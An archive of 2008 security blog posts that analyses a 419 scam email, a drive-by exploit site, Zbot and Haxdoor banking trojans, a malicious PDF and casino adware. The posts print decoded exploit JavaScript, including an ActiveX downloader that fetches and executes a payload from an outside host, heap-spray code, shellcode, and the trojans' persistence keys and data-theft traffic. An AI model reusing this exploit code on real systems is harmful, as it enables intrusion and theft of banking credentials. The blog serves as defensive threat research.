Sunday, December 21, 2008

IMF 419 Scam

419 and other advance-fee fraud scams are a regular part of life in the email world. I like to dig through my spam boxes to see what nuggets come up. A recent email with the subject "ECONOMIC STORM" indicated the "IMF international monetary fund and the world bank have collaborated to tackle the global economic storm facing the world." I'm glad to see someone is working to fix the economic crisis.

The email is spoofed from Mr.Dominique Strauss-Kahn and originates from the CHINANET-GD registered IP The email request the reply go to


Received: by with SMTP id s1cs313745fgb;
Sat, 20 Dec 2008 10:36:07 -0800 (PST)
Received: by with SMTP id s1mr2802117wad.118.1229798166053;
Sat, 20 Dec 2008 10:36:06 -0800 (PST)
Received: from pfyq6 ([])
by with SMTP id k21si16564504waf.32.2008.;
Sat, 20 Dec 2008 10:36:06 -0800 (PST)
Received-SPF: neutral ( is neither permitted nor denied by best guess record for domain of client-ip=;
Authentication-Results:; spf=neutral ( is neither permitted nor denied by best guess record for domain of
Message-Id: <>
From: "Mr.Dominique Strauss-Kahn"
Content-Type: text/plain;
Date: Sun, 21 Dec 2008 02:36:04 +0800
X-Priority: 3

This is to inform you/your company that IMF international monetary fund and the
world bank have collaborated to tackle the global economic storm facing
the world.
These authority have set aside the sum of USD 10,000,000,000 ( Ten Billion
United State Dollars ) to finance individuals/companies around the globe
who have a reasonable project.
All applicant should send their full data and project details (project name,
project purpose,project cost) to the address given below to apply the
support for your project.

Reply to Mr. John Condo
Project Finance Section
IMF Office Beijing China
( )

Yours sincerely,
Mr.Dominique Strauss-Kahn
Managing Director, IMF

The email attempts to validate itself by including a hyperlink to the bio of Mr.Dominique Strauss-Kahn. The only problem is the link points to the bio of Mr. Rodrigo de Rato, from Spain, who was the former Managing Director from June 7, 2004 to October 31, 2007.

Even the scammers can't keep up over time. It's amazing to security practitioners that these scams work, but at the same time we've all been asked by someone about the legitimacy of a virus hoax, 419, lottery, or chain email. you wouldn't think it's that profitable, but every once in a while, the scammers hit a goldmine. For example, Bruce Schneier recently blogged about a woman who lost $400K in a 419 scam. All I can say is i'm looking forward to my slice of the $10 Billion. WoooHooo!!!

Friday, December 19, 2008 Exploit Analysis

The analysis of exploit code hosted at results in the typical TTP that includes malicious obfuscated JavaScript, browser-based IE exploits, banking credential stealing malware and ISPs with dubious reputations. The story follows...

A request for returns 3 sections of obfuscated exploit code and an iframe for hxxp://soft4youupdat(dot)org.

<script>opdYzUDi=document.location.href;if(opdYzUDi.indexOf('http://')!=-1){eval('Tgwm\x61Tgwm\x7aTgwm…….truncated…….\x7bTgwm\x7dTgwm\x7d'.replace(/Tgwm/g, ''));}</script>

<script>ftXokBk6=document.location.href;if(ftXokBk6.indexOf('http://')!=-1){eval('qyT\x66qyT\x75qyT…….truncated…….\x7bqyT\x7dqyT\x7d'.replace(/qyT/g, ''));}</script>

<html><iframe src="hxxp://soft4youupdat(dot)org/counts/cache/doc.pdf" widht="1" height="1"></iframe></html>

<script>hu7AMj=document.location.href;if(hu7AMj.indexOf('http://')!=-1){eval('MZnVp\x76MZnVp\x61MZnVp…….truncated…….\x28MZnVp\x29MZnVp\x3b'.replace(/MZnVp/g, ''));}</script>

The JavaScript replace() Method is used to obfuscate the exploit code. The replace() Method syntax is


A 'g' flag is used to perform a global search and an 'i' flag is used to perform a case-insensitive search.

Exploit Block 1
The first block of exploit code globally replaces the characters Tgwm with the empty string ". The decoded section returns a string of escaped hexadecimal characters.


The hexadecimal character string decodes to reveal additional code that again uses the JavaScript replace() Method for obfuscation. The script decodes to reveal MDAC RDS.Dataspace ActiveX Control Vulnerability (CVE-2006-0003, MS06-014) exploit code. The payload is a GET request for hxxp://soft4youupdat(dot)org/counts/bin/default.exe.

az = new Array();az.push('h^t&tp)&://#$s$o#)ft4!yo*uup!da)t.)or*g!$/c((ou*n@ts!/)b#i%$n!/!@def!a^&u(l*t.exe#'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));for(i = 0; i <= az.length - 1; i++){ start(az[i], '.%/$/*@..^#/)@/f)i#(le#'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '') + i + '.(e(^x^e!'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));}function start(sUrl, sPath) { var z = document.createElement('o&b!j))e*ct!'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));z.setAttribute('id'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''),'z'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '')); z.setAttribute('clas@s!!i$!d@$'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), 'cl%(s&id:)B*D^9%6#C(5*^56&-^*65A3$-^11(D!(0-98*3A%-0#0(C%(0^4@FC@2(9(&E36$'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));try { var q = z.CreateObject('m&s!(xm@l%2.^&X&@M*LH@@T%T%*P'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), ''.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '')); var s = z.CreateObject('Sh$@el#l).A%)p(pli&c$^a$t((ion'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), ''.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));var t = z.CreateObject('a@do%db^).$#s$)t%(r!eam'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), ''.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '')); try { t.type = 1;'GE!T'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), sUrl, false);q.send();; t.write(q.responseBody); t.savetofile(sPath,2); t.close();} catch(e) {}try { s.shellexecute(sPath); if(shellexecute=true) { var b = new ActiveXObject('M)icros@#oft*&.X)$M^L&!H%&T&TP!'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));'G!ET#'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), 'l*$o%!ad).php^#?)m@dc='.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '') + Math.random()); b.send(null); }} catch(e){}} catch(e){}}

Exploit Block 2

The second block of exploit code uses the same obfuscation technique decoding to reveal Microsoft Access Snapshot Viewer ActiveX Control Vulnerability (CVE-2008-2463, MS08-041) exploit code. The payload is hxxp://soft4youupdat(dot)org/counts/load.php?ssv=' + Math.random().

function killErrors() { return true; } window.onerror = killErrors; var x; var obj;var myarr = new Array(); myarr[0] = 'c:\\Program Files\\Outlook Express\\wab.exe';myarr[1] = 'd:\\Program Files\\Outlook Express\\wab.exe';myarr[2] = 'e:\\Program Files\\Outlook Express\\wab.exe';setTimeout('window.location = "ldap://"', 5000);for (x in myarr){obj = new ActiveXObject('snpv$w@.S$*n%(a&ps&h%)o$t!$ Vi)ew&e&$r)# Co$n&t(ro$l.*%1$'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));try{var buf1 = 'http://soft4youupdat(dot)org/counts/load.php?ssv=' + Math.random();var buf2 = myarr[x]; obj.Zoom = 0;obj.SnapshotPath = buf1; obj.CompressedPath = buf2; obj.PrintSnapshot();}catch(e){}}

Exploit Block 3
The third block of exploit code included an iframe for hxxp://soft4youupdat(dot)org/counts/cache/doc.pdf. The PDF contained buffer overflow exploit code targeted against a vulnerability in the JavaScript method Collab.collectEmailInfo() in Adobe PDF Reader’s JavaScript Engine (CVE-2007-5659, APSB08-13). The PDF metadata indicates it was created with Scribus which provides desktop publishing for Linux/Unix. Scribus provides a step by step guide for beginning to enhance PDF with JavaScript. The creation date is 8-6-08.

13 0 obj

[filter FlateDecode has been applied to the JavaScript bitstream]

12 0 obj
14 0 obj
/Producer (Scribus PDF Library
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)

The tool Pdftk - the PDF Toolkit can be used to inflate the FlateDecode JavaScript. The tool syntax is:

pdftk input.pdf output output.pdf uncompress

The exploit shellcode payload is a GET request for hxxp://soft4youupdat(dot)org/counts/load.php?pdf=35f4a8d465e6e1edc05f3d8ab658c551.

function rvcfcd208495d565e()
var rvc4ca4238a0b9238 = new Array();

function rvc81e728d9d4c2f6(rveccbc87e4b5ce2f, rva87ff679a2f3e71)
while (rveccbc87e4b5ce2f.length * 2 < rveccbc87e4b5ce2f =" rveccbc87e4b5ce2f.substring(0," rv1679091c5a880fa =" 0x0c0c0c0c;" rv8f14e45fceea167 =" unescape(" rvc9f0f895fb98ab9 =" 0x400000;" rv45c48cce2e2d7fb =" rv8f14e45fceea167.length" rva87ff679a2f3e71 =" rvc9f0f895fb98ab9" rveccbc87e4b5ce2f =" unescape(" rveccbc87e4b5ce2f =" rvc81e728d9d4c2f6(rveccbc87e4b5ce2f," rvd3d9446802a4425 =" (rv1679091c5a880fa" rv6512bd43d9caa6e =" 0;" rvc51ce410c124a10 =" app.viewerVersion.toString();" rvc51ce410c124a10 =" rvc51ce410c124a10.replace(/\D/g," rvaab3238922bcc25 =" new" rv9bf31c7ff062936 =" unescape(" collabstore =" Collab.collectEmailInfo({subj:">

Exploit Block 4
The fourth block of exploit code uses the same obfuscation technique decoding to reveal 3 buffer overflow exploits:

• COM Object Instantiation Memory Corruption Vulnerability (CVE-2005-2127, MS05-052)
• Online Media Technologies NCTsoft NCTAudioFile2 ActiveX buffer overflow - CVE-2007-0018
• Microsoft Visual Studio 'Msmask32.ocx' ActiveX Control Remote Buffer Overflow Vulnerability (MS08-070)

The shellcode payload for all 3 exploits is hxxp://soft4youupdat(dot)org/counts/load.php?bof=3c59dc048e8850243be8079a5c74d079.

var Shellcode = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97%ub91c%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07%u1011%uba10%ua3bd%ua0a2%uefa1%u7468%u7074%u2F3A%u732F%u666F%u3474%u6F79%u7575%u6470%u7461%u6F2E%u6772%u632F%u756F%u746E%u2F73%u6F6C%u6461%u702E%u7068%u623F%u666F%u333D%u3563%u6439%u3063%u3834%u3865%u3538%u3230%u3334%u6562%u3038%u3937%u3561%u3763%u6434%u3730%u0039");function geSpyrrSlirrdep(sssprassydddbSliiide, saruuysaddize){while (sssprassydddbSliiide.length * 2 < sssprassydddbsliiide =" sssprassydddbSliiide.substring(0," hpsdyytttscess =" 0x0c0c0c0c;var" hadttdtsize =" 0x400000;var" payfdlytyusade =" Shellcode.length" tggter =" payfdLytyusade" saruuysaddize =" hadttdtSize" sssprassydddbsliiide =" unescape(" prrerat =" new" sssprassydddbsliiide =" geSpyrrSlirrdep(sssprassydddbSliiide," kilrrer =" hpsdyytttscess" hsttiicks =" kilrrer" i =" 0;" ugric =" unescape(" xyz =" 0x40000;while(ugric.length" ugric =" ugric.substring(0," bublic =" new" i =" bublic;">');zorro = Math.ceil(0xd0d0d0d);zorro = document.scripts[0].createControlRange().length;}catch(e) {}setTimeout("startAudioFile()", 2000);}function startAudioFile(){try{var mmed = document.createElement("object");mmed.setAttribute("classid", "clsid:77829F14-D911-40FF-A2F0-D11DB8D6D0BC");var mms="";for(var i=0; i < body =" '';var buf1 = '';for (i = 1; i <= 1945; i++){buf1 = buf1 + unescape(" href="">

Malware Analysis
The payload for all of the soft4youupdat(dot)org exploits is the same binary file.

Filename: bin_default.exe/default.exe
MD5: d9b7bf5b02fa9d1fc9da041916ff0a5e
Size: 59,392 bytes

The malware is a Zbot trojan which steals online banking information and downloads additional malware.

The following files are created:

308,736 bytes


The following registry key is created to launch the malware at startup:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] Userinit = "%System%\userinit.exe,%System%\ntos.exe,"

Virus total indicates a low detection rate for this particular variant at the time of analysis [Result: 9/38 (23.68%)]

Domain Analysis
The domain was registered 11-20-08 at Everyones Internet, Ltd.

Domain ID:D154732571-LROR Domain

Created On:20-Nov-2008 12:59:45 UTC
Last Updated On:20-Nov-2008 13:19:16 UTC
Expiration Date:20-Nov-2009 12:59:45 UTC
Sponsoring Registrar:Everyones Internet, Ltd. (R1381-LROR)
Registrant ID:tul8MyjB2Dv7rqIF
Registrant Name:Vladimir Mashkov
Registrant Organization:N/A
Registrant Street1:st. Lenin's 56 square 43
Registrant Street2:
Registrant Street3:
Registrant City:Moscow
Registrant State/Province:Moscow
Registrant Postal Code:10010
Registrant Country:RU
Registrant Phone:+7.4950784576
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:

The domain currently resolves to which is registered to the Plano, TX company SOFTLAYER Technologies Inc. (ASN AS36351,

aut-num: AS36351
as-name: SOFTLAYER
descr: SoftLayer Technologies Inc.
import: from AS-ANY accept ANY AND NOT {}
export: to AS-ANY announce AS36351
admin-c: IPADM258-ARIN
tech-c: IPADM258-ARIN
mnt-by: MAINT-AS36351
changed: 20060110
source: RADB

SOFTLAYER Technologies Inc leased IP space to Innovation IT Solutions Corp which is an international communications company headquartered in London, UK.

Innovation IT Solutions Corp. NET-67-228-139-0 (NET-67-228-139-0-1) -

SOFTLAYER Technologies Inc is listed by in their top 10 worst network block owners and the McColo Cyber Crime USA – V2.0 report lists the ISP in the top 5 worst network block owners. Both IT Solutions Corp and SOFTLAYER Technologies Inc have been previously tied to RBN activity and the Russian Cyberwar on Georgia.

Wednesday, November 12, 2008

Haxdoor ecard

On 11 November 2008, I received an email indicating that I had received an ecard.

Date: Tue, 11 Nov 2008 19:29:36 +0000
From: "" (spoofed)
To: "my love" <>
Subject: You have received an eCard

Good day.
You have received an eCard

To pick up your eCard, choose from any of the following options:
Click on the following link (or copy & paste it into your web browser):


Your card will be aviailable for pick-up beginning for the next 30 days.
Please be sure to view your eCard before the days are up!

We hope you enjoy you eCard.

Thank You!


The email included a hyperlink for hxxp:// The file ecard.exe is a variant of the Haxdoor malcode family. The domain is currently registered and hosted in the US (

34,440 bytes

The malware ecard.exe creates the following files:


20,108 bytes

7,072 bytes

Both Haxdoor files install as rootkits hiding themselves from the Windows API.

>SSDT State
Actual Address 0xF8B0CFE9
Hooked by: C:\WINDOWS\system32\vbagz.sys

Actual Address 0xF8B0CA86
Hooked by: C:\WINDOWS\system32\vbagz.sys

Actual Address 0xF8B0C467
Hooked by: C:\WINDOWS\system32\vbagz.sys

Actual Address 0xF8B0C799
Hooked by: C:\WINDOWS\system32\vbagz.sys

Actual Address 0xF8B0C7EF
Hooked by: C:\WINDOWS\system32\vbagz.sys

Suspect File: C:\WINDOWS\system32\gzipmod.dll Status: Hidden
Suspect File: C:\WINDOWS\system32\vbagz.sys Status: Hidden
ntoskrnl.exe-->IoCreateFile, Type: Inline - RelativeJump at address 0x80583218 hook handler located in [vbagz.sys]
ntoskrnl.exe-->IoGetCurrentProcess, Type: Inline - RelativeJump at address 0x804EDE00 hook handler located in [vbagz.sys]

[1476]RootkitRevealer.exe-->wininet.dll-->InternetReadFile, Type: Inline - RelativeJump at address 0x7620FA3C hook handler located in [unknown_code_page]
[1476]RootkitRevealer.exe-->wininet.dll-->InternetReadFileExA, Type: Inline - RelativeJump at address 0x7622571D hook handler located in [unknown_code_page]
[1724]svchost.exe-->ntdll.dll-->LdrLoadDll, Type: Inline - RelativeJump at address 0x77F55669 hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->HttpOpenRequestA, Type: Inline - RelativeJump at address 0x76206C0A hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->HttpSendRequestA, Type: Inline - RelativeJump at address 0x76210689 hook handler located in [gzipmod.dll]
[1724]svchost.exe-->wininet.dll-->InternetCloseHandle, Type: Inline - RelativeJump at address 0x7620974B hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->InternetConnectA, Type: Inline - RelativeJump at address 0x76205DE6 hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->InternetOpenA, Type: Inline - RelativeJump at address 0x7621017D hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->InternetQueryDataAvailable, Type: Inline - RelativeJump at address 0x7620FC5E hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->InternetReadFile, Type: Inline - RelativeJump at address 0x7620FA3C hook handler located in [unknown_code_page]
[1724]svchost.exe-->wininet.dll-->InternetReadFileExA, Type: Inline - RelativeJump at address 0x7622571D hook handler located in [unknown_code_page]

The malware gzipmod.dll creates:

C:\WINDOWS\System32\ answxt.bin

K86.bin stores keylogger data. The following log shows examples of logon attempts at USBank and Wachovia.

00000159 00000159 0 ==================Google - Microsoft Internet Explorer ; MOD:C:\Program Files\Internet Explorer\iexplore.exe
000001C7 000001C7 0 usbank Enter 123456671988wachovia Enter 1234567 Tab pass123usbank Enter 12121212pass123456

The following registry keys are created to load gzipmod.dll at startup:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache
Persistent = 0x00000000
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\gzipmod
DllName = "gzipmod.dll"
Startup = "gzipmod"
Impersonate = 0x00000001
Asynchronous = 0x00000001
MaxWait = 0x00000001
adr9i = "[6B1ADFD9D971359EA]"

The following registry keys are created to load vbagz.sys during a safe-mode boot:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vbagz.sys "(Default)"
Type: REG_SZ
Data: Driver
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vbagz.sys "(Default)"
Type: REG_SZ
Data: Driver

The following registry entries are set, affecting internet security:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List "C:\WINDOWS\System32\rundll32.exe"
Type: REG_SZ
Data: C:\WINDOWS\System32\rundll32.exe:*:Enabled:rundll32

The following registry entries install vbagz.sys as a service named “VBA2 PnP Driver”

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz "DisplayName"
Type: REG_SZ
Data: VBA2 PnP Driver
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz "ErrorControl"
Data: 00, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz "ImagePath"
Data: system32\vbagz.sys
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz "Start"
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz "Type"
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_VBAGZ\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz\Enum "Count"
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz\Enum "NextInstance"
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vbagz\Security "Security"
Data: [hexadecimal values]

The malware connects to The domain is registered and hosted in Russia (, SINGER-NET). The request returns instructions to download hxxp:// The domain is also registered and hosted in Russia (, SINGER-NET). The 11-11.bin file is saved as C:\WINDOWS\System32\tremir.bin. The bin file stores instructions for creating fake banking institution logon html pages and keylogger triggers.

GET /ie-bolt2/data.php?trackid=[string] HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.xpsp.6043-201935)
Host: Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Wed, 12 Nov 2008 03:52:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.6

CMND UU0 U4hxxp:// ED |END

GET /inj/11-11.bin HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.xpsp.6043-201935)

Keylogger and harvested data is exfiltrated to

POST /ie-bolt2/data.php?dt=0&id=4569 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0.xpsp.11731-201935)
Content-Length: 725
Content-Type: multipart/form-data; boundary=---------------------------
Connection: Keep-Alive
Pragma: no-cache
Content-Disposition: form-data; name="user" [string]
Content-Disposition: form-data; name="info"

CVE-2008-2992 Adobe PDF Exploitation

On 7 November 2008, SANS reported an active exploit against the Adobe Reader and Acrobat util.printf() JavaScript function stack buffer overflow vulnerability (CVE-2008-2992). Adobe Reader and Acrobat contain a stack buffer overflow in the util.printf() JavaScript function, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system. The vulnerability was first reported by CORE Security technologies in May 2008. Adobe released Adobe Reader and Adobe Acrobat 8.1.3 on 4 November 2008 to address the vulnerability (APSB08-19). Public exploit code was reported on 7 November 2008. The following analyzes a malicious PDF sample.

Exploit Analysis:

The site hosted the malicious PDF file data.pdf (hxxp:// The domain is controlled by five name servers at Dynamic DNS (DDNS) allows individuals to create a hostname that points to his/her dynamic IP or static IP address or URL. DynDNS also provides an update mechanism which makes the hostname work with a dynamic IP address.

At the time of exploit, resolved to located in the Netherlands.

inetnum: -
netname: LEASEWEB
descr: LeaseWeb
descr: P.O. Box 93054
descr: 1090BB AMSTERDAM
descr: Netherlands
remarks: Please send email to mailto:"" for complaints
remarks: regarding portscans, DoS attacks and spam.
remarks: INFRA-AW
country: NL
admin-c: LSW1-RIPE
tech-c: LSW1-RIPE
mnt-by: OCOM-MNT
source: RIPE # Filtered

The IP currently maps to 19 domains.



The malicious PDF file includes objects that contain document-level JavaScript.

00000581 00000581 0 24 0 obj
0000058A 0000058A 0 <</JavaScript 25 0 R>>
000005A1 000005A1 0 endobj
000005A8 000005A8 0 25 0 obj
000005B1 000005B1 0 <</Names[(main)26 0 R]>>
000005CA 000005CA 0 endobj
000005D1 000005D1 0 26 0 obj
000005DA 000005DA 0 <</S/JavaScript/JS 27 0 R>>
000005F6 000005F6 0 endobj
000005FD 000005FD 0 27 0 obj
00000606 00000606 0 <</Length 1257/Filter[/FlateDecode]>>stream
00000636 00000636 0 W[k+7
00000667 00000667 0 Ms(l6
00000799 00000799 0 Gs~tx
0000086E 0000086E 0 8U7n
0000091B 0000091B 0 l+Vi5
0000096B 0000096B 0 o :[hx
00000B1E 00000B1E 0 endstream
00000B28 00000B28 0 endobj
00000B2F 00000B2F 0 28 0 obj

The inflated PDF FlateDecode streams reveal obfuscated JavaScript which further decodes to reveal shellcode.

var sccs = unescape(""+"%"+"u03eb%u"+"eb59%ue805%uf"+"ff8%uffff%u4949%u4949%u494"+"9%u4937

var bgbl = unescape("%u0A0A"+"%u0A0A");
var slspc = 20 + sccs.length;
while(bgbl.length < fblk =" bgbl.substring(0,slspc);" blk =" bgbl.substring(0,bgbl.length" blk =" blk" mmy =" new" i =" 0;" nm =" 12;" i =" 0;" nm =" nm" i =" 0;" nm =" nm">

The shellcode execution results in a GET request for hxxp:// The domain is hosted at (same IP as

The request returns obfuscated JavaScript. The image reference for hxxp:// is for tracking purposes.

The decoded script reveals a redirect to

var xobj, response;
if(window.XMLHttpRequest) { try{ xobj = new XMLHttpRequest(); }catch(e){} }
if(!xobj) { try{ xobj = new ActiveXObject("Microsoft.XMLHTTP"); }catch(e){} }

if(xobj) {"GET", "/code/srun.php?req", false);
xobj.setRequestHeader("Request", "srun");
response = xobj.responseText;

if(response.length) {
dec(asas(response), "s", 2);
} else {
self.moveTo(3000, 3000);
self.opener = "opener";

The request returns content for additional binary downloads.

GET /code/srun.php?req HTTP/1.1
request: srun

Six minutes later, a GET request for occurred. Additional hex-encoded binaries were downloaded over an 8 minute period. Notice the user-agent (WinHttp.WinHttpRequest.5) and Request value: srun.

GET /get.php?src=xpre HTTP/1.1
Request: srun
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32;WinHttp.WinHttpRequest.5)


The following is an additional request that lacked the WinHttp.WinHttpRequest.5 user-agent.

GET /code/const.php HTTP/1.1

The downloaded malware installs a variety of crapware (rogue security products, adware, etc.)

Filename MD5 Size (Bytes)
data.pdf 84bc91579cd4dbee7faf3ee09c4a9a4b 10179
prun.exe d7512e025c439d8454a742992229770c 34816
rasesnet.exe 423d4daf5374710d4498ed917f44b92a 135168
searsnet.exe 18bd892d291f21f14e660537112bb81c 65024
snapsnet.exe 637146739c0dc4c078e0654e6d77eda1 112378
wavvsnet.exe 602b54e018fe9b226ebf8fd5ebaff09c 40014
winvsnet.exe 279ce5af3638a2ba1fde073bbe73a0c5 54784
xpre.exe 1d032fbc6d6884903fa92889f99fc180 745472

Gold VIP Club Casino

On 9 November 2008, a college university web page hosted obfuscated JavaScript that when decoded revealed an iframe to hxxp:// ( The following analysis tracks the redirect results.

<div style="visibility:hidden"><iframe src="hxxp://" width=100 height=80></iframe></div>

The hxxp:// request returned an HTTP 302 redirect to hxxp://

The hxxp:// request returned an HTTP 302 redirect to hxxp://

The hxxp:// request returned advertising content for a Gold Casino promotion.

“Download” and “Play Now!” buttons download hxxp://

<a href="SmartDownload.exe"><img src="images/download.gif" width="271" height="83" alt="" border="0"></a>

<a href="SmartDownload.exe"><img src="images/playnow.gif" width="96" height="124" alt="" border="0"></a&gt;

Domain Analysis: is registered in RU and is registered to NOC4Hosts Inc., US.

Several other malicious domains resolved to at the time of analysis. is registered in RU and is registered in China.

SmartDownload.exe Analysis:

466,752 bytes

Upon execution SmartDownload.exe creates the C:\Program Files\Gold VIP Club Casino directory and opens an installer window.

SmartDownload.exe connects to ( on TCP port 20000 to receive C2. The client sends the string “Gold VIP Club Casino” and receives the string “”. A second connection returns the string hxxp:// The client connects to which uses Akamai caching to download the installation files package_list.ini.crc and

GET /cdn/goldvipclub/package_list.ini.crc HTTP/1.1 Host:
GET /cdn/goldvipclub/ HTTP/1.1 Host:

The domain is registered to RealTime Gaming Holding Company, LLC (Costa Rica).

Reverse lookups for rotate through several casino themed domains.

The following major files are created.

c:\Program Files\Gold VIP Club Casino\casino.dll
745,472 bytes

c:\Program Files\Gold VIP Club Casino\casino.exe
30,720 bytes

The following major registry keys are added to launch Gold VIP Club Casino at statup.

HKEY_CLASSES_ROOT\CLSID\{0CBAA404-8C7F-4070-8E42-8847E2394816} "(Default)"
Type: REG_SZ
Data: Gold Vip Club Casino
HKEY_CLASSES_ROOT\CLSID\{0CBAA404-8C7F-4070-8E42-8847E2394816}\LocalServer32 "(Default)"
Type: REG_SZ
Data: c:\program files\gold vip club casino\casino.exe %1
HKEY_CLASSES_ROOT\CLSID\{0CBAA404-8C7F-4070-8E42-8847E2394816}\ProgID "(Default)"
Type: REG_SZ
Data: rtg.goldvipclub
HKEY_CLASSES_ROOT\rtg.goldvipclub "(Default)"
Type: REG_SZ
Data: URL: Realtime Gaming Protocol
HKEY_CLASSES_ROOT\rtg.goldvipclub "URL Protocol"
Type: REG_SZ
HKEY_CLASSES_ROOT\rtg.goldvipclub\CLSID "(Default)"
Type: REG_SZ
Data: {0CBAA404-8C7F-4070-8E42-8847E2394816}
HKEY_CLASSES_ROOT\rtg.goldvipclub\DefaultIcon "(Default)"
Type: REG_SZ
Data: casino.exe
HKEY_CLASSES_ROOT\rtg.goldvipclub\shell\open\command "(Default)"
Type: REG_SZ
Data: c:\program files\gold vip club casino\casino.exe %1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Gold VIP Club Casino "DisplayName"
Type: REG_SZ
Data: Gold VIP Club Casino

The launching of Gold VIP Club Casino initiates a connection to TCP port 22053. The casino game requires an account to be created and personal information provided. Not sure how much I would trust a game that was installed through obfuscated JavaScript, a series of redirects and deceptive advertising :)

Sunday, November 9, 2008

Presidential Malspam

On 05 November 2008, Barack Obama emails began circulating that contained hyperlinks to a fake news site that offered a video of Obama’s historic win. The site attempted to fool visitors into installing an Adobe Flash update adobe_flash.exe. The executable download installs an Infostealer trojan designed to steal personal information. Sophos and McAfee provided updates on the threat.

Sample email verbiage included the following:

"From: "President election results"
Subject: A new president, a new congress...
